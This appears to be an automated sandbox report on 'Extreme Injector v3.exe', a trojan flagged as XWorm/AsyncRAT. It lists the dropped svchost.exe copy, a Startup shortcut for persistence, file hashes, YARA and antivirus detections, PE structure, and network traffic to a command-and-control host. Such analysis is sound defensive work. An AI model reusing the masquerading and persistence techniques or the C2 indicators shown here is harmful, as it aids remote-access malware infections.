                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g4cgohfu.2r5.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ibdjfjzi.4ox.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mk5j3e4i.lsr.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_opgbho2e.gig.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q3qqnp5p.rnd.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qkjc1wbb.dcy.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t5h1xjd4.hvj.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vhv4skww.h1b.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xlktrxoc.byj.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ykyxec3o.bh0.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Extreme Injector v3.exe
                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Dec 30 22:49:03 2024, mtime=Mon Dec 30 22:49:03 2024, atime=Mon Dec 30 22:49:03 2024, length=70656, window=hide
                                                                                    Category:dropped
                                                                                    Size (bytes):764
                                                                                    Entropy (8bit):5.047070908321926
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:8f0BlE24MfMWCegdY//8++JLAvUniojAsprHkk/bPKqKEBmV:88T+yHg+UvFchsAspIkzLBm
                                                                                    MD5:65EECC9046069021D0DB6120A6861BC3
                                                                                    SHA1:930433CF29DEF9E5AFA5652BE7F2C7919523C07E
                                                                                    SHA-256:67FFEF80CB97EC995ED2F9263813CD98DB8C8120B2900709CA8F55866FD5CD20
                                                                                    SHA-512:243D089FF86D562B86D41756F7EC2FDFA927FCD305713B216D83989904C700CD6B964BDC47AA7674C734F2F9488B5073E3BFB1610E9B6179F6180677DE1239DA
                                                                                    Malicious:false
                                                                                    Preview:L..................F.... ......g.[...tFh.[.....g.[..........................v.:..DG..Yr?.D..U..k0.&...&......vk.v......+;.[..E:,h.[......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......CW.^.Y............................mX..R.o.a.m.i.n.g.....b.2......Y". .svchost.exe.H......Y"..Y"...........................w..s.v.c.h.o.s.t...e.x.e.......Y...............-.......X..............\.....C:\Users\user\AppData\Roaming\svchost.exe........\.....\.....\.....\.....\.s.v.c.h.o.s.t...e.x.e.`.......X.......016477...........hT..CrF.f4... ..........,.......hT..CrF.f4... ..........,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                                    C:\Users\user\AppData\Roaming\svchost.exe

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Extreme Injector v3.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):70656
                                                                                    Entropy (8bit):5.810994040072963
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:4wHTuFxg03F76Bb57HQQI6y0aOjla/bqQMuof6W:4wqE017qb5kQQhOjlCqB6W
                                                                                    MD5:C55BAF4BB32F9FE3D218F67CA63CA5B8
                                                                                    SHA1:7C527E04B3E4EBAA8394600221A1FCEBE7695BE8
                                                                                    SHA-256:DEFB2C3AB19F9ABF691EB50B39D3407EB0157D67BCEC4C3F73F261E9B5400C96
                                                                                    SHA-512:69FFD17E08CB332F1F1D50AD3F31AEAD3172B917F13127D672258BC7519A675EC1394277885C4F3DA378E8D2201D9556AF6B2270433567DE07F3760191D48907
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                                    • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Sekoia.io
                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 79%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....rg.....................D......N.... ........@.. ....................................@.....................................K........@...................`....................................................... ............... ..H............text...T.... ...................... ..`.rsrc....@.......B..................@..@.reloc.......`......................@..B................0.......H........\..8.......&.....................................................(....*.r...p*. 6...*..(....*.r...p*. ...*.s.........s.........s.........s.........*.r=..p*. {...*.r[..p*. ilc.*.ry..p*. j...*.r...p*. 9bN.*.r...p*. .|..*..((...*.r...p*. ...*.r...p*. S...*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(X...*&(....&+.*.+5si... .... .'..oj...(*...~....-.(\...(N...~....ok...&.-.*.r...p*. ..e.*.r...p*. E/..*.r5..p*. S...*.rS..p*.rq..p*. ..U.*.r...p*. V.Z.*.r...p*. .8F.*.r...p

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Entropy (8bit):5.810994040072963
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                    File name:Extreme Injector v3.exe
                                                                                    File size:70'656 bytes
                                                                                    MD5:c55baf4bb32f9fe3d218f67ca63ca5b8
                                                                                    SHA1:7c527e04b3e4ebaa8394600221a1fcebe7695be8
                                                                                    SHA256:defb2c3ab19f9abf691eb50b39d3407eb0157d67bcec4c3f73f261e9b5400c96
                                                                                    SHA512:69ffd17e08cb332f1f1d50ad3f31aead3172b917f13127d672258bc7519a675ec1394277885c4f3da378e8d2201d9556af6b2270433567de07f3760191d48907
                                                                                    SSDEEP:1536:4wHTuFxg03F76Bb57HQQI6y0aOjla/bqQMuof6W:4wqE017qb5kQQhOjlCqB6W
                                                                                    TLSH:DC639E48B7A54526D2FD1FF558B22121C771A3238933DB1F38D944DA2B23A8D8E513FA
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....rg.....................D......N.... ........@.. ....................................@................................

                                                                                    File Icon

                                                                                    Icon Hash:230b12240c1fcde7

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x40ec4e
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x6772D4D9 [Mon Dec 30 17:14:01 2024 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    jmp dword ptr [00402000h]
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xec000x4b.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x100000x40d6.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x160000xc.reloc
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x20000xcc540xce000a236e99e6d4a76244a69276ae1e440aFalse0.5853496662621359data6.031232990767861IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rsrc0x100000x40d60x42004ee11a52bb492b0218e8a1ef76b95795False0.4412878787878788data4.620825691020089IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .reloc0x160000xc0x2001791cda89f2bbf3405f75542513c3fe8False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                    Resources

                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                    RT_ICON0x101900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.42271784232365145
                                                                                    RT_ICON0x127380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.5051594746716698
                                                                                    RT_ICON0x137e00x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.5407801418439716
                                                                                    RT_GROUP_ICON0x13c480x30data0.8541666666666666
                                                                                    RT_VERSION0x13c780x274data0.4538216560509554
                                                                                    RT_MANIFEST0x13eec0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                                    Imports

                                                                                    DLLImport
                                                                                    mscoree.dll_CorExeMain

                                                                                    Network Behavior

                                                                                    Suricata IDS Alerts

                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                    2024-12-31T00:49:24.694825+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.449823147.185.221.2443985TCP

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Dec 31, 2024 00:47:59.399676085 CET4973080192.168.2.4208.95.112.1
                                                                                    Dec 31, 2024 00:47:59.404541016 CET8049730208.95.112.1192.168.2.4
                                                                                    Dec 31, 2024 00:47:59.404603004 CET4973080192.168.2.4208.95.112.1
                                                                                    Dec 31, 2024 00:47:59.405189991 CET4973080192.168.2.4208.95.112.1
                                                                                    Dec 31, 2024 00:47:59.409986019 CET8049730208.95.112.1192.168.2.4
                                                                                    Dec 31, 2024 00:47:59.908580065 CET8049730208.95.112.1192.168.2.4
                                                                                    Dec 31, 2024 00:47:59.956079006 CET4973080192.168.2.4208.95.112.1
                                                                                    Dec 31, 2024 00:48:37.468070984 CET8049730208.95.112.1192.168.2.4
                                                                                    Dec 31, 2024 00:48:37.468151093 CET4973080192.168.2.4208.95.112.1
                                                                                    Dec 31, 2024 00:49:10.402436018 CET4982343985192.168.2.4147.185.221.24
                                                                                    Dec 31, 2024 00:49:10.407358885 CET4398549823147.185.221.24192.168.2.4
                                                                                    Dec 31, 2024 00:49:10.407424927 CET4982343985192.168.2.4147.185.221.24
                                                                                    Dec 31, 2024 00:49:10.616890907 CET4982343985192.168.2.4147.185.221.24
                                                                                    Dec 31, 2024 00:49:10.621728897 CET4398549823147.185.221.24192.168.2.4
                                                                                    Dec 31, 2024 00:49:24.694824934 CET4982343985192.168.2.4147.185.221.24
                                                                                    Dec 31, 2024 00:49:24.699625015 CET4398549823147.185.221.24192.168.2.4
                                                                                    Dec 31, 2024 00:49:31.761749029 CET4398549823147.185.221.24192.168.2.4
                                                                                    Dec 31, 2024 00:49:31.762038946 CET4982343985192.168.2.4147.185.221.24
                                                                                    Dec 31, 2024 00:49:31.768636942 CET4982343985192.168.2.4147.185.221.24
                                                                                    Dec 31, 2024 00:49:31.769937992 CET4992043985192.168.2.4147.185.221.24
                                                                                    Dec 31, 2024 00:49:31.773477077 CET4398549823147.185.221.24192.168.2.4
                                                                                    Dec 31, 2024 00:49:31.774791956 CET4398549920147.185.221.24192.168.2.4
                                                                                    Dec 31, 2024 00:49:31.777932882 CET4992043985192.168.2.4147.185.221.24
                                                                                    Dec 31, 2024 00:49:31.805628061 CET4992043985192.168.2.4147.185.221.24
                                                                                    Dec 31, 2024 00:49:31.810437918 CET4398549920147.185.221.24192.168.2.4
                                                                                    Dec 31, 2024 00:49:39.926505089 CET4973080192.168.2.4208.95.112.1
                                                                                    Dec 31, 2024 00:49:40.237323046 CET4973080192.168.2.4208.95.112.1
                                                                                    Dec 31, 2024 00:49:40.846682072 CET4973080192.168.2.4208.95.112.1
                                                                                    Dec 31, 2024 00:49:42.049932003 CET4973080192.168.2.4208.95.112.1
                                                                                    Dec 31, 2024 00:49:44.456182957 CET4973080192.168.2.4208.95.112.1
                                                                                    Dec 31, 2024 00:49:44.769539118 CET4992043985192.168.2.4147.185.221.24
                                                                                    Dec 31, 2024 00:49:44.774306059 CET4398549920147.185.221.24192.168.2.4
                                                                                    Dec 31, 2024 00:49:49.268565893 CET4973080192.168.2.4208.95.112.1
                                                                                    Dec 31, 2024 00:49:53.183195114 CET4398549920147.185.221.24192.168.2.4
                                                                                    Dec 31, 2024 00:49:53.183589935 CET4992043985192.168.2.4147.185.221.24
                                                                                    Dec 31, 2024 00:49:54.390522003 CET4992043985192.168.2.4147.185.221.24
                                                                                    Dec 31, 2024 00:49:54.395438910 CET4398549920147.185.221.24192.168.2.4
                                                                                    Dec 31, 2024 00:49:54.401177883 CET5000543985192.168.2.4147.185.221.24
                                                                                    Dec 31, 2024 00:49:54.406040907 CET4398550005147.185.221.24192.168.2.4
                                                                                    Dec 31, 2024 00:49:54.408551931 CET5000543985192.168.2.4147.185.221.24
                                                                                    Dec 31, 2024 00:49:54.780415058 CET5000543985192.168.2.4147.185.221.24
                                                                                    Dec 31, 2024 00:49:54.785299063 CET4398550005147.185.221.24192.168.2.4
                                                                                    Dec 31, 2024 00:49:58.877955914 CET4973080192.168.2.4208.95.112.1
                                                                                    Dec 31, 2024 00:50:04.784503937 CET5000543985192.168.2.4147.185.221.24
                                                                                    Dec 31, 2024 00:50:04.789463997 CET4398550005147.185.221.24192.168.2.4

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Dec 31, 2024 00:47:59.386367083 CET5900753192.168.2.41.1.1.1
                                                                                    Dec 31, 2024 00:47:59.393440008 CET53590071.1.1.1192.168.2.4
                                                                                    Dec 31, 2024 00:49:10.371889114 CET6390353192.168.2.41.1.1.1
                                                                                    Dec 31, 2024 00:49:10.383852005 CET53639031.1.1.1192.168.2.4

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Dec 31, 2024 00:47:59.386367083 CET192.168.2.41.1.1.10x8023Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                    Dec 31, 2024 00:49:10.371889114 CET192.168.2.41.1.1.10xbdc1Standard query (0)or-officials.gl.at.ply.ggA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
